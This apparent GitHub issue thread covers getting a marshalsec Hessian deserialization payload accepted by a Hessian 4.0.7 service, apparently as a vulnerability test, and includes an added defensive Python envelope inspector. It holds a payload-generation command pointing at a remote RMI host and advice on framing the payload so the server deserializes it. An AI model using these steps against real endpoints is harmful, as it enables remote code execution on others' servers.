Closed yahanvesh closed 4 years ago
The payload generated is a "raw" data stream (e.g. 0x4D is a map object), I guess your service may be expecting an additional "envelope" e.g. headers or the RPC call wrapper. You should be able to find out what the service is expecting from the stacktrace. Then you could duplicate marshalsec.Hessian and overwrite HessianBase.marshal() to reflect whatever the service is expecting.
Here is the complete stack trace:
Apr 17, 2020 4:08:22 PM org.apache.catalina.core.StandardWrapperValve invoke
SEVERE: Servlet.service() for servlet [remoting] in context with path [/service] threw exception [Hessian skeleton invocation failed; nested exception is com.caucho.hessian.io.HessianProtocolException: expected string at 0x4d] with root cause
com.caucho.hessian.io.HessianProtocolException: expected string at 0x4d
at com.caucho.hessian.io.Hessian2Input.error(Hessian2Input.java:2882)
at com.caucho.hessian.io.Hessian2Input.expect(Hessian2Input.java:2830)
at com.caucho.hessian.io.Hessian2Input.readString(Hessian2Input.java:1362)
at com.caucho.hessian.io.Hessian2Input.readMethod(Hessian2Input.java:272)
at com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:249)
at com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:221)
at org.springframework.remoting.caucho.HessianExporter.doInvoke(HessianExporter.java:228)
at org.springframework.remoting.caucho.HessianExporter.invoke(HessianExporter.java:144)
at org.springframework.remoting.caucho.HessianServiceExporter.handleRequest(HessianServiceExporter.java:63)
at org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter.handle(HttpRequestHandlerAdapter.java:53)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1039)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:942)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1005)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:908)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:650)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:882)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at com.company.filter.CacheFilter.doFilter(CacheFilter.java:94)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:209)
at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:178)
at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:357)
at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:270)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at com.company.middleware.security.CsrfPreventionFilter.doFilter(CsrfPreventionFilter.java:166)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:494)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
at com.company.catalina.valves.CompanyAccessLogValve.invoke(CompanyAccessLogValve.java:218)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445)
at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1137)
at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)
at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Assuming https://github.com/sofastack/sofa-hessian/blob/537351cd10966804fca91b082ebe73c02dda1d73/src/main/java/com/caucho/hessian/server/HessianSkeleton.java#L225 is the correct code, you can see what is expected:
<callhdr> <headers*> <method_name> <n> <arg_1> .. <arg_n>
It's actually this one: https://repo1.maven.org/maven2/com/caucho/hessian/4.0.7/ or the exact code: http://kickjava.com/src/com/caucho/hessian/io/Hessian2Input.java.htm
Does it make sense to do something like this, just giving the payload with writeObject?
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import com.caucho.hessian.io.Hessian2Output;

public class Download {
    public InputStream download(String filename, InputStream data) throws IOException {
        //create your http connection and get the outputstream
        OutputStream os = ....;
        Hessian2Output out = new Hessian2Output(os);
        out.writeObject(filename);
        out.flush(); // push the Hessian-encoded string out before the raw bytes follow
        byte[] buffer = new byte[1024];
        int c = -1;
        while ((c = data.read(buffer)) != -1) {
            os.write(buffer, 0, c); // write only the bytes actually read, not the whole buffer
        }
        os.flush();
        //.....
    }
}
Looks like spring-aop is not on the classpath. I did a mvn dependency:build-classpath and did not find any of these classes: SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin.
Can I confirm then that it's not vulnerable? @mbechler
Hey @mbechler, any suggestions? Thanks in advance.
I found that the payload I generated was in Hessian 1.0 but my service was taking Hessian 2.0. By changing the code to use Hessian2Input and Hessian2Output, I was able to get around the issue.
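Both problems discussed in this thread (a raw object stream sent where the service expects a call envelope, and a Hessian 1.0 payload sent to a Hessian 2.0 endpoint) show up in the first few bytes of the request body, before any argument is deserialized. The following Python is an added example, not code from marshalsec or from the Hessian library: it decodes only the call envelope using the Hessian 1.0 and 2.0 framing rules from the protocol spec (the `<callhdr> <method_name> <n> ...` layout quoted above) and classifies a body as a well-formed 1.0 call, a well-formed 2.0 call, a raw object stream, or a malformed call, which is what a gateway or log pre-check would want to record. It assumes ASCII method names (Hessian string lengths count characters), does not parse 1.0 headers, and never reads the arguments; the sample byte strings are constructed, with the `H\x02\x02C` prefix mirroring the one mentioned in the issue.

```python
"""Inspect the envelope of a Hessian RPC request body (added example).

Reads only the call framing, never the arguments, so it can run as a cheap
pre-check or logging hook in front of the real Hessian deserializer.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass
class CallInfo:
    kind: str              # "hessian1", "hessian2", "raw" or "malformed"
    method: Optional[str]  # decoded method name, when the envelope holds one
    argc: Optional[int]    # declared argument count (2.0 envelopes only)
    detail: str            # reason text, meant for a log line


# Hessian 2.0 object tags a raw (envelope-less) serialized object may start with.
# 'H' (untyped map) is omitted because it collides with the 2.0 envelope marker.
_OBJECT_TAGS = {
    0x4D: "typed map 'M'",
    0x43: "class definition 'C'",
    0x4F: "object 'O'",
    0x56: "variable-length list 'V'",
}


def _read_h2_string(buf: bytes, pos: int):
    """Decode a Hessian 2.0 final string at buf[pos]; return (text, next_pos).

    0x00-0x1f: short string, length in the tag; 0x30-0x33: length in the low
    two bits of the tag plus one byte; 'S' (0x53): two-byte length.  Any other
    tag is not a string, which is exactly what the server reports as
    "expected string at 0x..".  Length is in characters; for ASCII method
    names (assumed here) that equals the byte count.
    """
    tag = buf[pos]
    if tag <= 0x1F:
        n, start = tag, pos + 1
    elif 0x30 <= tag <= 0x33:
        n, start = ((tag - 0x30) << 8) | buf[pos + 1], pos + 2
    elif tag == 0x53:
        n, start = (buf[pos + 1] << 8) | buf[pos + 2], pos + 3
    else:
        raise ValueError("expected string at 0x%02x" % tag)
    return buf[start:start + n].decode("utf-8"), start + n


def _read_h2_int(buf: bytes, pos: int):
    """Decode a Hessian 2.0 integer at buf[pos]; return (value, next_pos)."""
    tag = buf[pos]
    if 0x80 <= tag <= 0xBF:                       # one byte, -16 .. 47
        return tag - 0x90, pos + 1
    if 0xC0 <= tag <= 0xCF:                       # two bytes, -2048 .. 2047
        return ((tag - 0xC8) << 8) | buf[pos + 1], pos + 2
    if 0xD0 <= tag <= 0xD7:                       # three bytes
        return ((tag - 0xD4) << 16) | (buf[pos + 1] << 8) | buf[pos + 2], pos + 3
    if tag == 0x49:                               # 'I' + 4-byte big-endian
        return int.from_bytes(buf[pos + 1:pos + 5], "big", signed=True), pos + 5
    raise ValueError("expected int at 0x%02x" % tag)


def inspect_call(body: bytes) -> CallInfo:
    """Classify a request body by its envelope without deserializing arguments."""
    try:
        if not body:
            return CallInfo("malformed", None, None, "empty body")
        first = body[0]
        if first == 0x63:
            # Hessian 1.0 call: 'c' major minor 'm' b1 b0 <method> args* 'z'
            major, minor = body[1], body[2]
            if body[3] != 0x6D:   # an 'H' here would be a 1.0 header; not handled
                return CallInfo("malformed", None, None,
                                "1.0 envelope %d.%d: expected 'm' at offset 3, got 0x%02x"
                                % (major, minor, body[3]))
            n = (body[4] << 8) | body[5]
            method = body[6:6 + n].decode("utf-8")
            return CallInfo("hessian1", method, None, "Hessian %d.%d call" % (major, minor))
        if first == 0x48:
            # Hessian 2.0 call: 'H' major minor 'C' <string method> <int argc> args*
            major, minor = body[1], body[2]
            if body[3] != 0x43:
                return CallInfo("malformed", None, None,
                                "2.0 envelope %d.%d: expected 'C' at offset 3, got 0x%02x"
                                % (major, minor, body[3]))
            method, pos = _read_h2_string(body, 4)
            argc, _ = _read_h2_int(body, pos)
            return CallInfo("hessian2", method, argc, "Hessian %d.%d call" % (major, minor))
        name = _OBJECT_TAGS.get(first, "unknown tag")
        return CallInfo("raw", None, None,
                        "no call envelope: body starts with 0x%02x (%s)" % (first, name))
    except ValueError as exc:
        return CallInfo("malformed", None, None, str(exc))
    except IndexError:
        return CallInfo("malformed", None, None, "truncated envelope")


if __name__ == "__main__":
    # Constructed samples: a well-formed 2.0 call, and a body that carries the
    # envelope prefix from the issue but a typed map where the method name should be.
    for sample in (b"H\x02\x00C\x08download\x92\x0areport.pdfN",
                   b"H\x02\x02CM\x0acom.x.Foo1"):
        print(inspect_call(sample))
```

The second sample reproduces the server's complaint from the stack trace ("expected string at 0x4d") without running the deserializer at all, so the same check can be logged at the edge and correlated with the application error. A body that starts straight with an object tag is reported as "raw", which is the envelope-less case the maintainer describes.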
Issue: Hessian service doesn't like the payload generated
Payload generation command: java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://x.x.x.x:1099 > rmi_payload
My payload in hex:
Server detail: Hessian server version on my server: 4.0.7
Looks like Hessian doesn't like the first byte 4d.
I get the following error when I use a Python program to send the payload. (I do take care to prepend the H\x02\x02C bytes at the beginning of the payload.)
@mbechler Any suggestions?